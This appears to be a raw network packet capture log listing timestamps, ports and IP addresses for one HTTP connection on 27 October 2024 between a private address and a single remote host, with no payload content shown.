Oct 27, 2024 12:13:19.171354055 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.171391010 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.171400070 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.171425104 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.171477079 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.171513081 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.171544075 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.171577930 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.171586037 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.171613932 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.171658993 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.171830893 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.171865940 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.171909094 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.171967983 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.172002077 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.172045946 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.172108889 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.172189951 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.172236919 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.172244072 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.172278881 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.172324896 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.173530102 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.173563957 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.173598051 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.173609972 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.211311102 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.211350918 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.211371899 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.211385012 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.211455107 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.214067936 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.214114904 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.214175940 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.214212894 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.214247942 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.214262009 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.214262009 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.214286089 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.214327097 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.250405073 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.250474930 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.250526905 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.250541925 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.250564098 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.250598907 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.250637054 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.250716925 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.250716925 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.287170887 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.287282944 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.287343025 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.287347078 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.288980007 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.289081097 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.289117098 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.289186954 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.289186954 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.289249897 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.289284945 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.289320946 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.289333105 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.289356947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.289402962 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.289663076 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.289699078 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.289746046 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.289793015 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290002108 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290035963 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290055990 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.290071011 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290108919 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290118933 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.290271997 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290319920 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.290390015 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290424109 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290458918 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290472984 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.290493965 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290528059 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290539026 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.290580988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290616035 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290628910 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.290652037 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.290695906 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.291130066 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.291163921 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.291210890 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.291215897 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.291250944 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.291296959 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.291380882 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.291415930 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.291450024 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.291469097 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.330178022 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.330285072 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.330323935 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.330394983 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.330394983 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.332509041 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.332555056 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.332597017 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.332616091 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.332743883 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.332779884 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.332815886 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.332973003 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.332973003 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.333045006 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.369482994 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.369617939 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.369656086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.369690895 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.369714022 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.369714022 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.369729996 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.369780064 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.406131029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.406202078 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.406270981 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.406270027 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.407465935 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.407521963 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.407552958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.407660007 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.407660961 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.407670975 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.407717943 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.407752991 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.407886028 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.407928944 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.407929897 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.407994032 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.408029079 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.408076048 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.408154011 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.408190012 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.408236027 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.408315897 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.408441067 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.408477068 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.408488989 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.408626080 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.408679008 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.408687115 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.408714056 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.408750057 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.408771992 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.408863068 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.408893108 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.408910990 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.409082890 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.409092903 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.409126997 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.409142017 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.409188032 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.409194946 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.409229040 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.409277916 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.409393072 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.409426928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.409461021 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.409473896 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.409495115 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.409559965 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.409691095 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.409725904 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.409760952 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.409774065 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.410139084 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.410173893 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.410190105 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.448190928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.448260069 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.448296070 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.448297024 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.448348999 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.451009989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.451118946 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.451153040 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.451172113 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.451337099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.451359034 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.451389074 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.487689972 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.487747908 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.487792969 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.487828016 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.487917900 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.487932920 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.488138914 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.488178968 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.488184929 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.488190889 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.488241911 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.524772882 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.524817944 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.524852991 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.524863958 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.526273012 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.526325941 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.526325941 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.526360035 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.526405096 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.526519060 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.526551962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.526587009 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.526597977 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.526623964 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.526665926 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.526736021 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.526812077 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.526859045 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.526890039 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.526922941 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.526958942 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.526967049 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.527054071 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.527137995 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.527146101 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.527276993 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.527309895 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.527334929 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.527363062 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.527410984 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.527430058 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.527558088 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.527625084 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.527673960 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.527708054 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.527741909 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.527760983 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.527822018 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.527856112 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.527882099 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.527980089 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.528032064 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.528075933 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.528109074 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.528165102 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.528228045 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.528240919 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.528275013 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.528291941 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.528471947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.528503895 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.528527975 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.528539896 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.528587103 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.528723955 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.528774977 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.528820038 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.528841019 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.567004919 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.567029953 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.567048073 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.567073107 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.567095995 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.569987059 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.570080996 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.570116997 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.570133924 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.570250988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.570286036 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.570296049 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.606555939 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.606679916 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.606718063 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.606753111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.606791019 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.607343912 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.643446922 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.643508911 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.643549919 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.643625021 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.644939899 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645025015 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645030975 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.645060062 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645193100 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645245075 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645278931 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.645278931 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645308018 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.645502090 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645535946 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645570993 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645603895 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.645817041 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645848989 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.645850897 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645885944 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645919085 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.645920038 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645953894 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.645984888 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.646225929 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.646260023 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.646294117 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.646295071 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.646327972 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.646363020 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.646364927 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.646656036 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.646689892 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.646722078 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.646756887 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.646758080 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.646759033 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.647042036 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647075891 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647109032 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.647111893 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647141933 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.647156954 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647320032 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.647361994 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647397041 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647430897 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647465944 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647589922 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.647681952 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647733927 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647767067 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647798061 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.647799969 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647835970 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647871017 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.647882938 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647933960 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.647964001 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.685672045 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.685756922 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.685837030 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.685873032 CET	80	49712	185.215.113.16	192.168.2.5
